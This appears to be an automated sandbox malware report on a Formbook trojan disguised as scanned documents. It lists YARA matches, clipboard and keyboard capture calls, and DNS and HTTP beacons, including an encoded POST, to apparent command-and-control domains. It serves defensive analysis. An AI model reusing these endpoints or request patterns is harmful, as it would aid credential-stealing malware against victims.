            Source: global trafficHTTP traffic detected: GET /jda9/?GTP=uhqpjxIPh&efM=34snQIO0a+qzYlkt+6IEft1gxD/ZK6L7qOToIJHZshoLhvuGziw8TW5Od2ToMUc/iXvMW07TMOYG4pWJ/ehZbdqmuEYhDCzj/N3rZv+VTG2UiN/ilnh8230= HTTP/1.1Host: www.mqmsqkw.lolAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
            Source: global trafficHTTP traffic detected: GET /yxos/?efM=GsI4mtIQVr1bqd+V/1qEiGWG2JWSdng8JQsV9k25RNexwN7KNHOmJ2uIpR4VD7Ui+v6cwkDz1p2XqdzqrAR32o8KijRXgfnfSTbVFHsQqIz2A3ZpJ0HUFH4=&GTP=uhqpjxIPh HTTP/1.1Host: www.lfghtko.lolAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
            Source: global traffic | DNS traffic detected: DNS query: www.stemfiniti.com
            Source: global traffic | DNS traffic detected: DNS query: www.zhuan-tou.com
            Source: global traffic | DNS traffic detected: DNS query: www.lecoinsa.net
            Source: global traffic | DNS traffic detected: DNS query: www.8xbe578.app
            Source: global traffic | DNS traffic detected: DNS query: www.synergon.space
            Source: global traffic | DNS traffic detected: DNS query: www.alanbeanart.com
            Source: global traffic | DNS traffic detected: DNS query: www.kacotae.com
            Source: global traffic | DNS traffic detected: DNS query: www.slushcafe.top
            Source: global traffic | DNS traffic detected: DNS query: www.a9jcpf.top
            Source: global traffic | DNS traffic detected: DNS query: www.tqfabxah.com
            Source: global traffic | DNS traffic detected: DNS query: www.rtrpodcast.online
            Source: global traffic | DNS traffic detected: DNS query: www.winkthree.com
            Source: global traffic | DNS traffic detected: DNS query: www.mqmsqkw.lol
            Source: global traffic | DNS traffic detected: DNS query: www.lfghtko.lol
            Source: unknown | HTTP traffic detected: POST /pjmu/ HTTP/1.1 | Host: www.zhuan-tou.com | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en | Origin: http://www.zhuan-tou.com | Referer: http://www.zhuan-tou.com/pjmu/ | Content-Length: 200 | Content-Type: application/x-www-form-urlencoded | Connection: close | Cache-Control: no-cache | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31 | Data Ascii: efM=+jf92ON16YkIfTrYzNA2A213zkydvK5sCwZJeRSlfH8YKYaHEJ39UGL1jYh0N2NHB8RZwth/OsKDzPLqx0rEZh8NUu9FhlfKVG6aM5y8CglG19/zGiKmAlR8WVg//Bo9G7XKVnMYKVVVbZ+441XrHzJiW7IipLzraef+TofVrLZgmeVXRCJpEUoQ1eZ8T0x2Yg==
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 05 Aug 2024 13:31:35 GMT | Content-Type: text/html | Content-Length: 548 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 05 Aug 2024 13:31:37 GMT | Content-Type: text/html | Content-Length: 548 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 05 Aug 2024 13:31:40 GMT | Content-Type: text/html | Content-Length: 548 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 05 Aug 2024 13:31:42 GMT | Content-Type: text/html | Content-Length: 548 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | x-powered-by: PHP/5.6.40 | content-type: text/html; charset=UTF-8 | content-length: 810 | content-encoding: br | vary: Accept-Encoding | date: Mon, 05 Aug 2024 13:32:16 GMT | server: LiteSpeed
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | x-powered-by: PHP/5.6.40 | content-type: text/html; charset=UTF-8 | content-length: 810 | content-encoding: br | vary: Accept-Encoding | date: Mon, 05 Aug 2024 13:32:19 GMT | server: LiteSpeed
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | x-powered-by: PHP/5.6.40 | content-type: text/html; charset=UTF-8 | content-length: 810 | content-encoding: br | vary: Accept-Encoding | date: Mon, 05 Aug 2024 13:32:21 GMT | server: LiteSpeed
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | x-powered-by: PHP/5.6.40 | content-type: text/html; charset=UTF-8 | content-length: 2247 | date: Mon, 05 Aug 2024 13:32:24 GMT | server: LiteSpeed
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: openresty | Date: Mon, 05 Aug 2024 13:32:44 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: openresty | Date: Mon, 05 Aug 2024 13:32:46 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: openresty | Date: Mon, 05 Aug 2024 13:32:49 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: openresty | Date: Mon, 05 Aug 2024 13:32:51 GMT | Content-Type: text/html | Content-Length: 552 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Aug 2024 13:32:57 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Aug 2024 13:33:00 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Aug 2024 13:33:02 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Aug 2024 13:33:05 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: MHFAGZiftf.exe, 00000007.00000002.4112168789.0000000002DB8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://lecoinsa.net/7ffx/?GTP=uhqpjxIPh&amp;efM=bNQ0/ONSUiz8CveulmeeGbtq
            Source: schtasks.exe, 00000004.00000002.4112702566.00000000043B8000.00000004.10000000.00040000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.0000000002DB8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://lecoinsa.net/7ffx/?GTP=uhqpjxIPh&efM=bNQ0/ONSUiz8CveulmeeGbtq
            Source: MHFAGZiftf.exe, 00000007.00000002.4113899205.0000000004B78000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lfghtko.lol
            Source: MHFAGZiftf.exe, 00000007.00000002.4113899205.0000000004B78000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lfghtko.lol/yxos/
            Source: schtasks.exe, 00000004.00000002.4114680149.0000000007EEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: schtasks.exe, 00000004.00000002.4114680149.0000000007EEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: schtasks.exe, 00000004.00000002.4114680149.0000000007EEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: schtasks.exe, 00000004.00000002.4114680149.0000000007EEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000030DC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dhosting.pl
            Source: schtasks.exe, 00000004.00000002.4112702566.00000000046DC000.00000004.10000000.00040000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000030DC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dhosting.pl/bledyhttp/domeny.html
            Source: schtasks.exe, 00000004.00000002.4112702566.00000000046DC000.00000004.10000000.00040000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000030DC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dhosting.pl/bledyhttp/hosting.html
            Source: schtasks.exe, 00000004.00000002.4112702566.00000000046DC000.00000004.10000000.00040000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000030DC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dhosting.pl/img/logo.svg
            Source: MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000030DC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dhosting.pl/kontakt
            Source: schtasks.exe, 00000004.00000002.4112702566.0000000004EB6000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000004.00000002.4114511435.0000000006400000.00000004.00000800.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000038B6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark
            Source: schtasks.exe, 00000004.00000002.4114680149.0000000007EEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: schtasks.exe, 00000004.00000002.4114680149.0000000007EEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: schtasks.exe, 00000004.00000002.4114680149.0000000007EEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: schtasks.exe, 00000004.00000002.4112702566.0000000004EB6000.00000004.10000000.00040000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000038B6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
            Source: schtasks.exe, 00000004.00000002.4114511435.0000000006400000.00000004.00000800.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000038B6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
            Source: schtasks.exe, 00000004.00000002.4112702566.0000000004EB6000.00000004.10000000.00040000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000038B6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
            Source: schtasks.exe, 00000004.00000002.4112702566.0000000004EB6000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000004.00000002.4114511435.0000000006400000.00000004.00000800.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000038B6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?
            Source: schtasks.exe, 00000004.00000002.4112702566.0000000004EB6000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000004.00000002.4114511435.0000000006400000.00000004.00000800.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000038B6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js
            Source: schtasks.exe, 00000004.00000002.4112702566.0000000004EB6000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000004.00000002.4114511435.0000000006400000.00000004.00000800.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000038B6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css
            Source: schtasks.exe, 00000004.00000002.4111169499.0000000003130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: schtasks.exe, 00000004.00000002.4111169499.0000000003130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: schtasks.exe, 00000004.00000002.4111169499.0000000003130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: schtasks.exe, 00000004.00000002.4111169499.0000000003130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: schtasks.exe, 00000004.00000002.4111169499.0000000003130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: schtasks.exe, 00000004.00000002.4111169499.0000000003130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: schtasks.exe, 00000004.00000003.2131359680.0000000007ECC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: schtasks.exe, 00000004.00000002.4112702566.0000000004EB6000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000004.00000002.4114511435.0000000006400000.00000004.00000800.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000038B6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://track.uc.cn/collect
            Source: schtasks.exe, 00000004.00000002.4114680149.0000000007EEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002FEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_002FEAFF
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002FED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_002FED6A
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002EAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_002EAA57
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_00319576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00319576

            E-Banking Fraud

            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1950883710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4110797200.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4111043032.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1951519783.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4111935021.0000000003C90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4111848670.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4113899205.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1951562901.0000000004990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1950883710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4110797200.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4111043032.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1951519783.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4111935021.0000000003C90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4111848670.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.4113899205.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
